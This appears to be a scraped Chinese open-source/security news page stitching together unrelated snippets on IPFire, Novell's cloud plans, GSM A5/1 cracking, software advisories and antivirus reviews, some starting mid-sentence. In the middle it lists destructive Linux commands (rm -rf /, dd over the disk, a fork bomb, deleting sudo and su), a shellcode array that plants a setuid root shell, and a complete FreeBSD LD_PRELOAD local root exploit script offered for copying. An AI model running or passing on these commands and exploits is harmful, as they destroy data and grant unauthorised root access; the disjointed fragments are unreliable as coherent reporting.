这个新的版本基于最新的Linux2.6.32内核，修改了超过400多个错误，包括软件包更新，如OpenSSL 0.9.80，Memtest 4.10以及当前稳定的Squid Web代理版本. 其它更改包括VPN更新、增加了硬件支持、Web界面修改和性能提高。开发者称，目前还没有通过内部定制包管理，名为Pakpire，只有ISO文件发布，更新包要到7月9日才可以使用。

更多详细关于IPFire，请查看官方发布公告。IPFire 2.7 (Core 38)  下载，同时也提供了安装指南。

下一个主要版本IPFire3.0目前还在开发中，不过你可以尝试一下 首个alpha，这个版本不能用来实际业务，仅做测试。IPFire基于GPLv3发布。

查看系统截屏演示

Novell中国业务全球第一

张先民在与CNET的访谈中，回顾了2009年Novell中国的成绩。他透露，“中国区业务在2009年成长了50%，在全球16个大区中是做得最好的一个市场。因此Novell总部决定对中国市场进行新一轮投资，这其中就设计云计算。”

2010年发力云计算

2010年发力云计算，重组后的Novell公司，将变成一个更加专注于整合和敏捷的全球化公司，定位于一个智能工作负载管理解决方案，系统集成和身份管理，虚拟化和云计算的公司。

张先民说，“Novell将全力进入云计算市场，我2010年最大的任务就是把Novell从一个操作系统提供商向云计算解决方案提供商转型。”

据张先民透露Novell做构建、安全、管理、衡量等层面为客户提供云计算解决方案，云架构共分为多层：最底层是基础实施（服务器、存储等），向上是构建，再向上一层是管理、安全和优化，再向上是用户门户，计费，最上面一层则是提供云服务的各种服务商（IaaS、PaaS、SaaS），比如有亚马逊、谷歌、中国电信等等。

本文内容引用CNET科技资讯网：Novell悄然涉足云计算 张先民：2010年加速转型

OSSS.CN开源社区将在本文重点介绍关于移动通讯的安全问题。据26C3大会安全研究人员发布的开源指令，这套系统可以用来破解A5/1移动电话加密算法并建立IMSI（国际移动用户识别码）捕捉器用来拦截移动电话通信。全球移动通讯系统 (GSM)作为数字移动手机网络标准，被全球200个国家的40亿人所使用，现在看来是非常不安全的。以上所描述的是来自于著名的密码学专家Karsten Nohl演讲，他向在场的黑客展示了这个事实。其实上早在1994年学术届就有对此做过类似试验。

Nohl是从去年夏天开始了 他的研究项目证明了移动电话通讯系统是有安全漏洞。基本问题是一个分布式的被动攻击A5/1，这种加密算法已经被专家称为不安全的，而且可以非常简单的破解它。

Nohl和他的团队表示他们找到了A5/1的密钥，这个密钥可以用来拦截GSM通讯，比想像中要简单的多。在大会现场的工作间中准备演示给观众看的硬件黑客说：“我们认为需要6个月时间来完成这件事，但没想到在3个月中通过40台计算机就完成了此事”。

根据Nohl，尽管GSM的背后单位GSMA 产业协会表示主要的安全问题并不是GSM本身的加密标准，而是改变传输通道的使用方法。因此，黑客需要一个接收站处理原始数据和程序。 看来，GSM协会并没有意识到，这样的计算机系统已经可以通过免费的OpenBTS软件建立GSM基站。

OpenBTS软件和免费的Asterisk软件组合可以帮助安全专家建立IMSI捕捉器破译GSM网络，而相同应用被德国警方以及情报部门用于定位移动手机用户，需要花费1500美金购买。很显然开源的解决方案可以做为更低成本来替代。

详情登陆26C3的 官方网站（需要翻墙）

有关A5/1破解软件：http://reflextor.com/trac/a51

Nessus

详细功能请查看官方功能描述、下载、文档、插件。

系统截屏，点击放大

1. 以下命令可以很容易把你计算机磁盘上的数据清除掉。

• sudo rm -rf /
• rm -rf .*
• dd if=/dev/zero of=/dev/sda
• mkfs.ext3 /dev/hda
• whatever > /dev/hda
• cd ~; for x in `ls`; do mv -f $x $y; y=$x; done
• find -type f -mtime +30 -exec mv {} /dev/null \;
• mv ~ /dev/null
• mv / /dev/null

2. 以下命令将引起内核异常:

• dd if=/dev/random of=/dev/port
• ){:|:&};: #also known as fork bomb

3. 这个命令类似“rm -rf /”:

char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

4. 这个命令将预防来自 root 权限执行命令

rm -f /usr/bin/sudo;rm -f /bin/su

我想应该还有其它更多的命令，可以摧毁Linux。有兴趣朋友不防在评论中跟上！

截屏，点击放大

前不久FreeBSD8.0

LD_PRELOAD 指令充许程序在启动之前载入附加的函数库。 在UNIX的动态链接库的世界中，LD_PRELOAD就是这样一个环境变量，它可以影响程序的运行时的链接（Runtime linker），它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量，我们可以在主程序和其动态链接库的中间加载别的动态链接库，甚至覆盖正常的函数库。一方面，我们可以以此功能来使用自己的或是更好的函数（无需别人的源码），而另一方面，我们也可以以向别人的程序注入恶意程序，从而达到那不可告人的罪恶的目的

目前受到影响的版本有FreeBSD 8.0和FreeBSD 7.1，不过FreeBSD 6.3和FreeBSD 4.9不受到影响。由于问题的紧急，FreeBSD的安全人员Colin Percival发布了补丁，但并没有发布强制性的警告。Percival指出，这个补丁还不是完整的，我们需要静下心来修改。这个安全人员同时也说道，补丁没有安全测试，我们不能保证是否完全的修正这个漏洞。

系统测试
**********************************
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN

*漏洞利用脚本，复制另存为*.sh文件*
**********************************
#!/bin/sh

echo ** FreeBSD local r00t zeroday

echo by Kingcope

echo November 2009

cat > env.c << _EOF

#include <stdio.h>
main() {

extern char **environ;

environ = (char**)malloc(8096);
environ[0] = (char*)malloc(1024);

environ[1] = (char*)malloc(1024);

strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");
execl("/sbin/ping", "ping", 0);

}

_EOF

gcc env.c -o env

cat > program.c << _EOF

#include <unistd.h>

#include <stdio.h>

#include <sys/types.h>

#include <stdlib.h>
void _init() {

extern char **environ;

environ=NULL;

system("echo ALEX-ALEX;/bin/sh");

}

_EOF

gcc -o program.o -c program.c -fPIC

gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles

cp w00t.so.1.0 /tmp/w00t.so.1.0

./env
**********************************
代码转自：seclists.org

所谓“肉鸡电脑”就是被黑客利用木马手段在远方控制的计算机。除去木马，并非易事。怎么办呢？

此刻，在我的计算机（运行Ubuntu Remix 9.10操作系统）桌面上只剩下了浏览器和办公套件的两个图标（硬盘线已拔掉），非常简洁，以便体验一把谷歌Chrome电脑的乐趣。11月26日，观看中央电视台播放的法制教育节目，提及“黑色产业链”，对犯罪嫌疑人“黑色靓点”的交代十分恼火。黑客利用木马控制用户的电脑之后，当成“肉鸡”在网上出售，广东地区的肉鸡一元人民币一只，港澳地区肉鸡3元一只，外国肉鸡则要10～20元一只。肉鸡被人买去之后，将肉鸡中的银行帐号、游戏货币、游戏设备、QQ货币、密码、个人隐私信息……（行话叫“洗信”）分类打包，再到5173、淘宝网上去公开出售。肉鸡危害如此之大，简直令人毛发直立。据说，国内的黑色产业链的“年产值”可达200亿元人民币。

实际上，黑客把木马偷偷地放在某些网站上，一旦用户访问该网站，往往在不被察觉的情况下就“中招儿”了，被黑客逮住，成为肉鸡。在这种情况下，用户的机密信息和个人隐私当然毫无秘密可言。怎么办呢？

实际情况是，电脑用户利用杀毒软件把木马杀掉。以后，如果再中毒，就再杀掉，如此循环往复，没完没了，……但是，只要你一不留神，不知道在什么时候，你的机密信息就已被黑客偷出去了，而且，很可能被偷盗了不止一次。怎么办呢？

大家知道，“冲浪宝”其实就是Live USB，也叫自启动 U盘。利用“冲浪宝”上网冲浪，绝对不会“中招儿”。有人说，“冲浪宝”不能玩网络游戏。未必。“冲浪宝”可分为不同级别，高、中、低。高级“冲浪宝，什么不能做？”“冲浪宝”的运行机理不是Windows，黑客拿它没有办法。对用户宣传“冲浪宝”，不要说什么Linux系统安全，也不必说Linux系统可靠，只要说它不是Windows操作系统即可。人们担心，“冲浪宝”好用吗？其实，“冲浪宝”就是“光棍”浏览器。有什么不好用的？在我们国内，Linux的名声被搞臭了，没有人稀罕它。实际上，看看Moblin 2.1和Remix 9.10的小模样儿，都怪可爱的。实际上，“冲浪宝”就是一个“光棍”浏览器，功能上根本无法与Win 7比高低，甘拜下风了。前天下午，我去北京中关村电脑大卖场，发现1GB容量的U盘已经停产，一般都是4GB或8GB的U盘。1GB的“冲浪宝”到哪里去找呢？原来，我希望18元钱就可买到一块“冲浪宝”。4GB容量的“冲浪宝”太浪费了。

说明：“冲浪宝”的外形，各色各样，男女有别；“冲浪宝”的技术，根源相同，不分高低；“冲浪宝”的厂商，五湖四海，各显神通。

Clarified（与RIA合作的其中一个公司）的CTO Jani Kenttälä说：“在这个项目中，我们使用了很多优秀的开源工具，这些开源我们通过开发后，将返回开源社区”。前二个开源项目计划发布 “Snort4all” 和”Abuse helper”；Snort4all将用于入侵检查和监控其它的网络事件，而Abuse Helper将帮助CERT Estonia管理网络滥用事件。

Opera把这个漏洞列为“极其严重”。该漏洞可以通过升级得到修复。本次升级还修复了一个欺骗漏洞，能够阻止不受控制的feed对象通过脚本自动订阅Feed，还修复了在用户界面，Email，news和chat功能中的小漏洞。

据说联合的安全套件可以保护公司员工(不管你在什么地方工作)免受恶意软件和病毒的攻击。管理员可以用Vital Cloud中心的终端，控制和监视远端的设备就像病毒扫描器一样。Vital Cloud Hybrid提供了在云中从on-premise web安全到web安全的转换。Finjan的产品是基于一个专有的，专利的分析过程，能够在转换期间检查数据。如果有需要，在几分钟内管理员就可以添加额外的web扫描工具。

中的漏洞。在安全公告中列出了总共48个CVE条目。这些漏洞可能会被利用来实施denial-of-service（DoS）攻击或破坏系统。

当攻击者在访问console和console 网络的时候，在这种情况下，在Service Console 内核和JRE中的漏洞才有可能被利用，攻击者可以通过LAN穿透ESX Server的DHCP客户端。

在DHCP和JRE中的漏洞，vCenter，VirtualCenter和Server 2.0中也受到了感染。但是，NMware仍在为这些产品修复补丁。

XSS的漏洞，当受控制的链接点击时，允许攻击者通过特制的表的名字在受害者的phpMyAdmin网页中，嵌入任意的JavaScript代码。而SQL注入的漏洞是由导出PDF的一个参数的错误引起的，只有在认证的用户中才会触发。考虑到这些漏洞的危害，建议用户升级到新版本。

根据Adobe公司说，Windows，Machintosh 和UNIX下的Acrobat和Reader的9.1.3和8.1.6版本，以及Windows，Macintosh下的7.1.3版本，会受到感染。现在Adobe Reader和Acrobat 9.2，8.1。7和7.1.4以及解决了这些漏洞，现在可以使用。

建议所有的Reader和Acrobat(Windows ,Macintosh)的用户尽可能快的升级到最新版本。该更新包含在Adobe为Adobe Acrobat和Adobe Reader第二次发布的quarterly security updates中。

谷歌Android移动平台已经变得越来越受到人们的欢迎，而Open Source Computer Emergency Response Team（开源计算机紧急响应小组)发现了两个1.5版本的漏洞，不过这两个漏洞现在已经被谷歌打上了补丁。

根据oCert安全咨询的内容，第一个漏洞出现Android处理文本信息的时候。一个特殊的畸形SMS可以导致一个让手机和蜂窝网络断开连接。这个畸形的SMS由一个错误格式的WAP Push信息组成，可以在手机应用程序里导致一个ArrayIndexOutOfBoundsException（数组越界异常）。

之后手机应用会无声地重启，会结束通话和断开连接。如果手机的SIM卡被一个PIN保护着，那么用户会被要求重新输入PIN码，会让用户耽误更多的时间带来更多的麻烦。如果这个bug被反复触发，将会引发一个拒绝服务攻击。

新的Apache服务器修复了三个漏洞，两个严重等级为低，一个为中等，另外修复了一系列其他的bug。此次修复所做的变更通知单已经发布，而且新版本的Apache服务器已经可以在很多镜像下载到。

等级为低的两个漏洞均发现在mod_proxy_ftp模块。其中一个漏洞是由空指针的错误引用导致的，一个恶意的代理服务器可以通过EPSV或者PASV指令的异常应用，从而通过该漏洞挂掉一个子进程，造成一个受限的拒绝服务攻击。另外一个漏洞则是：在一个反向代理配置中，一个远程的攻击者可以使用该缺陷绕开拟访问的限制，攻击者先是创造一个精心推敲的授权HTTP头，然后就能肆意发送指令给FTP服务器。

等级为中的漏洞发现在APR模块，该bug是一个错误的故障处理从而导致影响到了Solaris pollset支持（Event Port backend）。Solaris服务器若是使用了prefork或者event MPMs，远程攻击者就可以通过触发该事件导致一个拒绝服务攻击。

AVG网络安全对在Windows Xp上已知的病毒，蠕虫，木马有97.64%的基于特征的检测。该工具会对94%的广告和间谍软件发出警告。在扫描600，000个干净的文件时没有发出一个错误的警告，在25次的攻击中24次，成功对感染的PC消毒，当然并不能排除所有的踪迹如，遗漏了一个的文件。

在查找删除25个root kits是扫描器只犯了一个错误，遗漏了一个隐藏的文件。在启发是检测和特征检测不能发现的污染物，在使用行为监测时，AVG能够找到和纠正80%的污染物。LinkScanner能够阻塞受感染的网站，能够检测到90%.

防火墙在这个套件中完全经过修正，提供商说在防火墙中使用了一个数据库来帮助决定一个程序是否允许和系统的组件通信，或者是否阻塞该通信。AVG的Indentity Protection,也整合到了套件中，希望能和其他的组件更好的起作用。

Scareware会通过在网页上弹出窗口和一些广告，试图以此来欺骗用户使他们认为他们的PC感染病毒，就像最近在New York Times网站出现的标题广告。而这个标题会链接到欺诈者的关于反间谍和反病毒的网站。而这些软件根本没什么用处，在安装了之后，会列出一些假的病毒报告，这样会要求你支付费用来清除这些病毒。怎么样辨别scareware的信息，免受它的侵害，这里有一篇文章是由H Security发布的“Thieves and charlatans – Rogue anti-virus products”

Astaro Security Gateway7.5一个新的特性是针对多核的操作系统的而加入了Intrusion protection Engine ,是一个实时的宽带检测包括了 Dshboard的改进和使用认证门户的透明的HTTP代理模式。另外，为了能够克隆对象便于重新使用，用户现在可以使用Import/Export Widget导入和导出他们的变量列表。其他的改进包括Dynamic Host Configuration Protocol(DHCP)配置，和web安全的支持和扩展的网络安全报告。

更详细的内容已经发布，包括安装说明和全部的改进列表，可以在发布的注意事项中看到。Astaro Gateway7.5已经可以下载。Astaro的社区是astraro.org

Chrome的用户现在可以通过内置的更新函数来更新。

在他的把戏中，根据Moxie Marlinspike在黑帽会议上说明的方法，Appelbaum修改域名中间0字符，像Marlinspike的thoughtcrime.org域名，Applelbaum输入*\00thoughtcrime.noisebridge.net,这样可以为任意的域名创建一个有效的通配符：

CN= *\00thoughtcrime.noisebridge.net

OU = Moxie Marlinspike Fan Club

O = NoisebridgeL = San Francisco

T = CaliforniaC = US

首次由heise Security小组测试，其公司在德国，试图在脆弱的浏览器中访问域名时没有引起警告。现在流行的浏览器为了阻止这样的把戏，也进行了相应的升级。其他的产品和构架需要提供SSL认证的的服务器也得到了相应更新。因此Appelbaum公开的发布‘Internet certificate’没有引起任何问题。专家说这个认证允许开发者来测试他们程序的安全性。

名词解释  beta:

1、 测试第二版

2、在软件测试领域，beta测试是邀请用户体验参加的测试方式。

在文中，为第二种解释